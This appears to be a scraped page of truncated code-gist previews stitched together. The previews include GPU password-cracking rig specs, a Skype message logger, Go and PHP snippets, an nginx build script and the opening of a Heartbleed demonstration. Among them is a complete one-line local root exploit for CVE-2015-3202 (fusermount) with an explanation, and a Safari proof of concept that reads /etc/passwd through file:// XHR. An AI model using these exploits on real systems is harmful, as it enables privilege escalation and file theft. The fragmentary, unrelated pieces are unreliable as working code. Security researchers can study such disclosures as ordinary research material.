Product: Sagitta Brutalis Titan X (PN S3480-GTX-TITANX)
Software: cudaHashcat 1.36, ForceWare 346.59
Accelerator: 8x Nvidia GTX Titan X reference design
| import Skype4Py | |
| def Commands(message, status): | |
| if status == 'SENT' or (status == 'RECEIVED'): | |
| print message.Body | |
| skype = Skype4Py.Skype() | |
| skype.OnMessageStatus = Commands | |
| skype.Attach() | |
| while True: |
| package main | |
| import ( | |
| "encoding/json" | |
| "fmt" | |
| "io/ioutil" | |
| "log" | |
| "net/http" | |
| "net/url" | |
| "os" |
| import ( | |
| "archive/zip" | |
| "io" | |
| "os" | |
| "path/filepath" | |
| "strings" | |
| ) | |
| func zipit(source, target string) error { | |
| zipfile, err := os.Create(target) |
| <?php | |
| /* | |
| * This code is copied from | |
| * http://www.warpconduit.net/2013/04/14/highly-secure-data-encryption-decryption-made-easy-with-php-mcrypt-rijndael-256-and-cbc/ | |
| * to demonstrate an attack against it. Specifically, we simulate a timing leak | |
| * in the MAC comparison which, in a Mac-then-Encrypt (MtA) design, we show | |
| * breaks confidentiality. | |
| * | |
| * Slight modifications such as making it not serialize/unserialize and removing |
Product: Sagitta Brutalis Titan X (PN S3480-GTX-TITANX)
Software: cudaHashcat 1.36, ForceWare 346.59
Accelerator: 8x Nvidia GTX Titan X reference design
| # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
| 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
| a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
| # Here's how it works, $a holds the name of a shellscript to be executed as | |
| # root. | |
| a=/tmp/.$$; | |
| # $b is used twice, first to build the contents of shellscript $a, and then as |
Product: Sagitta Brutalis 980 (PN S2480-GTX-980)
Software: cudaHashcat 1.36b25, ForceWare 346.35
Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset
| It appears that Safari does not enforce any kind of access | |
| restrictions for XMLHTTPRequests on FILE: scheme URLs. As a | |
| result, any HTML file on the local file system that is opened in | |
| Safari can read any file that the user has access to (and, of | |
| course, it can upload those files too). Here's a little | |
| proof-of-concept. Copy and paste this into a local HTML file and | |
| open it in Safari. It will display the contents of /etc/passwd. | |
| <script src=https://code.jquery.com/jquery-2.1.3.min.js></script> | |
| <script> |
| #!/usr/bin/env bash | |
| # names of latest versions of each package | |
| export VERSION_PCRE=pcre-8.38 | |
| export VERSION_OPENSSL=openssl-1.0.2d | |
| export VERSION_NGINX=nginx-1.9.7 | |
| # URLs to the source directories | |
| export SOURCE_OPENSSL=https://www.openssl.org/source/ | |
| export SOURCE_PCRE=ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/ |
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| import sys | |
| import struct | |
| import socket | |
| import time | |
| import select |